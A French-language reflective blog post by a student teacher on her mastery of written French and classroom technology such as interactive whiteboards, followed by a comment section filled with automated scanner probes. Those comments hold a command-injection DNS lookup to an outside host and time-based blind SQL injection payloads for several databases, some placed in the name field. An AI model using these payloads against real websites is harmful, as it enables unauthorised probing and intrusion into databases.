En tant que futurs enseignants, nous devons prêcher par l’exemple en prenant les mesures nécessaires afin d’écrire et parler avec un français exempt de faute (compétence 2). Je considère que je maitrise bien cette compétence puisque j’ai réussi mon test oral ainsi que mon test de certification en français écrit pour l’enseignement (TECFÉE). Je considère que je parle avec aisance autant dans mon enseignement que dans mes échanges avec mes collègues, la direction et les parents d’élève. La compétence 8, quant à elle, traite de l’intégration des technologies de l’information et de la communication (TIC). «L’utilisation d’Internet et son intégration dans les pratiques pédagogiques […] les initient à rechercher et à s’approprier des informations, à varier leurs sources de documentation, […] favorisent leur accès aux bibliothèques virtuelles et la diffusion de leurs résultats, leur offrent la possibilité d’interagir avec les autres et de confronter leurs opinions par l’envoi de courriels ou encore par leur participation à des groupes ou à des forums de discussion.» (Lebrun et al., 2006) Lorsqu’on nous a dit en première année du Baccalauréat qu’on allait enseigner avec les TNI, j’avais peur de ne pas être assez compétente, que les élèves en sache plus que moi et soit plus à l’aise à manipuler les TIC. Par contre, j’ai pu travailler lors de trois de mes stages avec un tableau numérique interactif (TNI) et me familiariser avec les portables lors de projets. De plus, j’ai réussi le cours TED3001 à distance avec la TÉLUQ. Par contre, je n’ai pas utiliser l’ensemble des TIC et bien que je saurai les utiliser avec la pratique, je pense que je peux aider les élèves pour qu’il utilise les TIC, mais avec la pratique. Je considère donc que je me situe au niveau de la consolidation dans cette compétence.
Afin de me préparer à la passation du TECFÉE, je me suis inspirée de plusieurs ressources internet afin de développer ma compétence en français écrit. Parmi ces sites, j’ai utilisé le site du Centre collégial de développement de matériel didactique (CCDMD) contenant plusieurs exercices et jeux interactifs. De plus, le site de la Dictée Éric-Fournier regroupe plusieurs dictées gratuites en ligne. Puis, j’ai parcouru plusieurs sites internet afin de regrouper le plus d’expressions et d’exceptions de la langue française afin de bien me préparer à la passation du test. J’ai vu notamment à quel point ces sites étaient utiles et accessibles. De plus, j’ai appris de nombreuses expressions que j’ai appris afin de parfaire ma culture générale.
Pour les deux compétences, on pourrait dire que je suis au niveau consolidation puisque bien que je maitrise mon français oral et écrit, je ne pourrais pas dire que j’écris toujours sans faire de faute. Par contre, je sais bien utiliser mes outils de correction. Je crois que mes compétences sont toujours à renouveler afin de bien les maitriser. C’est pourquoi, je devrai continuer de lire, d’écrire, et d’utiliser mes outils afin de me pratiquer à bien parler et écrire. Concrètement, en stage, je vais d’ailleurs me filmer et analyser non seulement le contenu de mon enseignement, ma gestion de classe, mais également mes qualités d’orateur et mon français à l’oral. Ainsi, je pourrai voir et mettre des correctifs nécessaires pour maintenant une bonne qualité de la langue. Afin d’améliorer ma compétence 8, je souhaite poursuivre mon utilisation des ressources pédagogiques sur internet, utiliser mon TNI au quotidien pendant mon stage et explorer différents sites internet en évaluant leur pertinence de façon critique et les intégrer dans mon enseignement s’ils respectent le Programme de formation de l’école québécoise (PFÉQ) et la Progression des apprentissages (PDA). Pour se faire, je vais inclure dans mes planifications des vidéos, Powerpoint, applications ou tous autres outils permettant l’utilisation du TNI à chaque fois que c’est possible. Aussi, nous avons tendance à oublier que le tableau numérique dit interactif doit inclure la participation des élèves. En effet, «au moment où plusieurs penseurs accusaient l’école d’ennuyer les élèves et de les maintenir dans des rôles passifs d’écoute et de mémorisation, un nouveau moyen actif et individualisé d’apprendre s’offrait aux enseignants». (Lebrun et al., 2006) Je vais donc tenter de permettre à mes élèves d’utiliser le TNI et les accompagner dans les tâches permettant l’utilisation des portables, entre autre.
Afin de constater mon niveau de maitrise de ma compétence 2, le document qui attestent ma réussite du TECFÉE est présenté plus haut. Je vous invite également à lire mon billet intitulé : «TBI : bilan noir sur fond blanc» afin de constater les bienfaits du TBI dans les classes ainsi que l’utilisation que j’en faisais lors de mon premier stage.
Source: Lebrun, Nicole, Claudette Gagné et Pierre Lalongé. Moyens pédagogiques et univers social au primaire. Montréal: Éditions Nouvelles, 2006, 205 p.
Écrire commentaire
CpjJwWHV (dimanche, 21 novembre 2021 11:16)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:17)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:17)
(nslookup hitstehwargsd0b4c1.bxss.me||perl -e "gethostbyname('hitstehwargsd0b4c1.bxss.me')")
CpjJwWHV (dimanche, 21 novembre 2021 11:17)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:17)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:18)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:18)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:18)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:18)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:18)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:19)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:20)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:20)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:21)
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
CpjJwWHV (dimanche, 21 novembre 2021 11:21)
-1); waitfor delay '0:0:15' --
CpjJwWHV (dimanche, 21 novembre 2021 11:22)
-5 OR 261=(SELECT 261 FROM PG_SLEEP(15))--
CpjJwWHV (dimanche, 21 novembre 2021 11:22)
Ndr1sBJv' OR 827=(SELECT 827 FROM PG_SLEEP(15))--
CpjJwWHV (dimanche, 21 novembre 2021 11:23)
20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
CpjJwWHV (dimanche, 21 novembre 2021 11:23)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:24)
20
CpjJwWHV (dimanche, 21 novembre 2021)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:25)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:26)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:26)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:27)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:28)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:28)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:29)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:30)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:34)
20
if(now()=sysdate(),sleep(15),0) (dimanche, 21 novembre 2021 11:35)
20
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z (dimanche, 21 novembre 2021 11:36)
20
1 waitfor delay '0:0:15' -- (dimanche, 21 novembre 2021 11:36)
20
hq6u0pCW' OR 651=(SELECT 651 FROM PG_SLEEP(15))-- (dimanche, 21 novembre 2021 11:37)
20
CpjJwWHV'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' (dimanche, 21 novembre 2021 11:38)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:38)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:39)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:39)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:40)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:40)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:41)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:41)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:42)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:43)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:47)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:47)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:48)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:48)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:49)
20
CpjJwWHV (dimanche, 21 novembre 2021)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:50)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:51)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:51)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:52)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:53)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:53)
20
CpjJwWHV (dimanche, 21 novembre 2021 11:54)
20
CpjJwWHV (dimanche, 21 novembre 2021 12:05)
20